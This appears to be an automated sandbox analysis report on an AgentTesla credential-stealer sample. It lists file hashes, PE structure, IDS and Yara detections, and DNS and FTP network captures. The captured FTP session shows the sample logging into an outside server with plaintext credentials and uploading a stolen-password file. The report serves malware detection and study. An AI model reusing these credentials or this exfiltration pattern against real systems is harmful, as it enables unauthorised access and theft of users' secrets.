                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.8590585184951305
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:Q4YODvoYjL.exe
                                        File size:743936
                                        MD5:e30c67b19383f259d7414b763049eb2f
                                        SHA1:8a1465b73066cf8642d39c9ef2333d8361e9d177
                                        SHA256:182086eeecf6f1b4dc82a040a476d947759556513ad63c129604c565cd06cdc3
                                        SHA512:259d0ab342f9bbc514d57064203ef45f07f2236b50fae92c29842371350627ada09a745a48fefc0ec8f85f524dad7f0252ef807714d09991cffb633cb61578f7
                                        SSDEEP:12288:C4hmYMUnFW/NxBig0kCw7B89OFsFVLWJDGeVjhiPJ8MoN5oxbjS2RyXyabHWHRpe:C4hUDQNkCQoOFYVADxkBzO2xbjJyiSWE
                                        TLSH:8FF402742BEA9739F43297BE85A43545976E63B32717C84C04F211CE4BA3B435ED0A2B
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..d..............0..D...........b... ........@.. ....................................@................................
                                        Icon Hash:209480e66eb84902
                                        Entrypoint:0x4b62fe
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6417B720 [Mon Mar 20 01:30:08 2023 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Instruction
                                        jmp dword ptr [00402000h]
                                        Name                                 | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT         | 0xb62ab         | 0x4f         | .text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0xb8000         | 0x1110       | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
                                        IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0xba000         | 0xc          | .reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG          | 0xb4e98         | 0x54         | .text
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
                                        IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
                                        IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
                                        Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity    | File Type | Entropy             | Characteristics
                                        .text  | 0x2000          | 0xb4304      | 0xb4400  | False    | 0.9267144699202496 | data      | 7.867913508227014   | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc  | 0xb8000         | 0x1110       | 0x1200   | False    | 0.73046875         | data      | 6.632660853110352   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc | 0xba000         | 0xc          | 0x200    | False    | 0.041015625        | data      | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        Name          | RVA     | Size  | Type                                                                              | Language | Country
                                        RT_ICON       | 0xb8100 | 0xa79 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                       |          |
                                        RT_GROUP_ICON | 0xb8b8c | 0x14  | data                                                                              |          |
                                        RT_VERSION    | 0xb8bb0 | 0x360 | data                                                                              |          |
                                        RT_MANIFEST   | 0xb8f20 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |          |
                                        DLL         | Import
                                        mscoree.dll | _CorExeMain
                                        Timestamp                | Protocol | SID     | Message                                 | Source Port | Dest Port | Source IP   | Dest IP
                                        03/20/23-18:32:35.384138 | TCP      | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49700       | 54926     | 192.168.2.5 | 190.107.177.239
                                        03/20/23-18:32:35.159386 | TCP      | 2029927 | ET TROJAN AgentTesla Exfil via FTP      | 49699       | 21        | 192.168.2.5 | 190.107.177.239
                                        Timestamp                           | Source Port | Dest Port | Source IP   | Dest IP
                                        Mar 20, 2023 18:32:25.379782915 CET | 50295       | 53        | 192.168.2.5 | 8.8.8.8
                                        Mar 20, 2023 18:32:25.400003910 CET | 53          | 50295     | 8.8.8.8     | 192.168.2.5
                                        Mar 20, 2023 18:32:25.412838936 CET | 60841       | 53        | 192.168.2.5 | 8.8.8.8
                                        Mar 20, 2023 18:32:25.435102940 CET | 53          | 60841     | 8.8.8.8     | 192.168.2.5
                                        Mar 20, 2023 18:32:32.898178101 CET | 61893       | 53        | 192.168.2.5 | 8.8.8.8
                                        Mar 20, 2023 18:32:33.119693041 CET | 53          | 61893     | 8.8.8.8     | 192.168.2.5
                                        Timestamp                           | Source IP   | Dest IP | Trans ID | OP Code            | Name                       | Type           | Class       | DNS over HTTPS
                                        Mar 20, 2023 18:32:25.379782915 CET | 192.168.2.5 | 8.8.8.8 | 0xc630   | Standard query (0) | api.ipify.org              | A (IP address) | IN (0x0001) | false
                                        Mar 20, 2023 18:32:25.412838936 CET | 192.168.2.5 | 8.8.8.8 | 0x4bf1   | Standard query (0) | api.ipify.org              | A (IP address) | IN (0x0001) | false
                                        Mar 20, 2023 18:32:32.898178101 CET | 192.168.2.5 | 8.8.8.8 | 0x4e5    | Standard query (0) | ftp.valvulasthermovalve.cl | A (IP address) | IN (0x0001) | false
                                        Timestamp                           | Source IP | Dest IP     | Trans ID | Reply Code   | Name                       | CName          | Address         | Type                   | Class       | DNS over HTTPS
                                        Mar 20, 2023 18:32:25.400003910 CET | 8.8.8.8   | 192.168.2.5 | 0xc630   | No error (0) | api.ipify.org              | api4.ipify.org |                 | CNAME (Canonical name) | IN (0x0001) | false
                                        Mar 20, 2023 18:32:25.400003910 CET | 8.8.8.8   | 192.168.2.5 | 0xc630   | No error (0) | api4.ipify.org             |                | 173.231.16.76   | A (IP address)         | IN (0x0001) | false
                                        Mar 20, 2023 18:32:25.400003910 CET | 8.8.8.8   | 192.168.2.5 | 0xc630   | No error (0) | api4.ipify.org             |                | 104.237.62.211  | A (IP address)         | IN (0x0001) | false
                                        Mar 20, 2023 18:32:25.400003910 CET | 8.8.8.8   | 192.168.2.5 | 0xc630   | No error (0) | api4.ipify.org             |                | 64.185.227.155  | A (IP address)         | IN (0x0001) | false
                                        Mar 20, 2023 18:32:25.435102940 CET | 8.8.8.8   | 192.168.2.5 | 0x4bf1   | No error (0) | api.ipify.org              | api4.ipify.org |                 | CNAME (Canonical name) | IN (0x0001) | false
                                        Mar 20, 2023 18:32:25.435102940 CET | 8.8.8.8   | 192.168.2.5 | 0x4bf1   | No error (0) | api4.ipify.org             |                | 104.237.62.211  | A (IP address)         | IN (0x0001) | false
                                        Mar 20, 2023 18:32:25.435102940 CET | 8.8.8.8   | 192.168.2.5 | 0x4bf1   | No error (0) | api4.ipify.org             |                | 173.231.16.76   | A (IP address)         | IN (0x0001) | false
                                        Mar 20, 2023 18:32:25.435102940 CET | 8.8.8.8   | 192.168.2.5 | 0x4bf1   | No error (0) | api4.ipify.org             |                | 64.185.227.155  | A (IP address)         | IN (0x0001) | false
                                        Mar 20, 2023 18:32:33.119693041 CET | 8.8.8.8   | 192.168.2.5 | 0x4e5    | No error (0) | ftp.valvulasthermovalve.cl |                | 190.107.177.239 | A (IP address)         | IN (0x0001) | false
                                        • api.ipify.org
                                        Timestamp                           | Source Port | Dest Port | Source IP       | Dest IP         | Commands
                                        Mar 20, 2023 18:32:33.570523024 CET | 21          | 49699     | 190.107.177.239 | 192.168.2.5     | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                                                             220-You are user number 3 of 100 allowed.
                                                                                                                                             220-Local time is now 14:32. Server port: 21.
                                                                                                                                             220-This is a private system - No anonymous login
                                                                                                                                             220-IPv6 connections are also welcome on this server.
                                                                                                                                             220 You will be disconnected after 15 minutes of inactivity.
                                        Mar 20, 2023 18:32:33.570781946 CET | 49699       | 21        | 192.168.2.5     | 190.107.177.239 | USER cva19491@valvulasthermovalve.cl
                                        Mar 20, 2023 18:32:33.794506073 CET | 21          | 49699     | 190.107.177.239 | 192.168.2.5     | 331 User cva19491@valvulasthermovalve.cl OK. Password required
                                        Mar 20, 2023 18:32:33.797815084 CET | 49699       | 21        | 192.168.2.5     | 190.107.177.239 | PASS LILKOOLL14!!
                                        Mar 20, 2023 18:32:34.036129951 CET | 21          | 49699     | 190.107.177.239 | 192.168.2.5     | 230 OK. Current restricted directory is /
                                        Mar 20, 2023 18:32:34.259531975 CET | 21          | 49699     | 190.107.177.239 | 192.168.2.5     | 200 OK, UTF-8 enabled
                                        Mar 20, 2023 18:32:34.259732962 CET | 49699       | 21        | 192.168.2.5     | 190.107.177.239 | PWD
                                        Mar 20, 2023 18:32:34.483745098 CET | 21          | 49699     | 190.107.177.239 | 192.168.2.5     | 257 "/" is your current location
                                        Mar 20, 2023 18:32:34.483958006 CET | 49699       | 21        | 192.168.2.5     | 190.107.177.239 | TYPE I
                                        Mar 20, 2023 18:32:34.707490921 CET | 21          | 49699     | 190.107.177.239 | 192.168.2.5     | 200 TYPE is now 8-bit binary
                                        Mar 20, 2023 18:32:34.707700014 CET | 49699       | 21        | 192.168.2.5     | 190.107.177.239 | PASV
                                        Mar 20, 2023 18:32:34.930713892 CET | 21          | 49699     | 190.107.177.239 | 192.168.2.5     | 227 Entering Passive Mode (190,107,177,239,214,142)
                                        Mar 20, 2023 18:32:35.159385920 CET | 49699       | 21        | 192.168.2.5     | 190.107.177.239 | STOR PW_user-632922_2023_03_20_18_32_31.html
                                        Mar 20, 2023 18:32:35.383680105 CET | 21          | 49699     | 190.107.177.239 | 192.168.2.5     | 150 Accepted data connection
                                        Mar 20, 2023 18:32:35.610061884 CET | 21          | 49699     | 190.107.177.239 | 192.168.2.5     | 226-File successfully transferred
                                                                                                                                             226 0.225 seconds (measured here), 1.52 Kbytes per second


                                        Target ID:0
                                        Start time:18:32:02
                                        Start date:20/03/2023
                                        Path:C:\Users\user\Desktop\Q4YODvoYjL.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\Q4YODvoYjL.exe
                                        Imagebase:0x820000
                                        File size:743936 bytes
                                        MD5 hash:E30C67B19383F259D7414B763049EB2F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:low

                                        Target ID:1
                                        Start time:18:32:23
                                        Start date:20/03/2023
                                        Path:C:\Users\user\Desktop\Q4YODvoYjL.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\Q4YODvoYjL.exe
                                        Imagebase:0x5a0000
                                        File size:743936 bytes
                                        MD5 hash:E30C67B19383F259D7414B763049EB2F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low

                                        No disassembly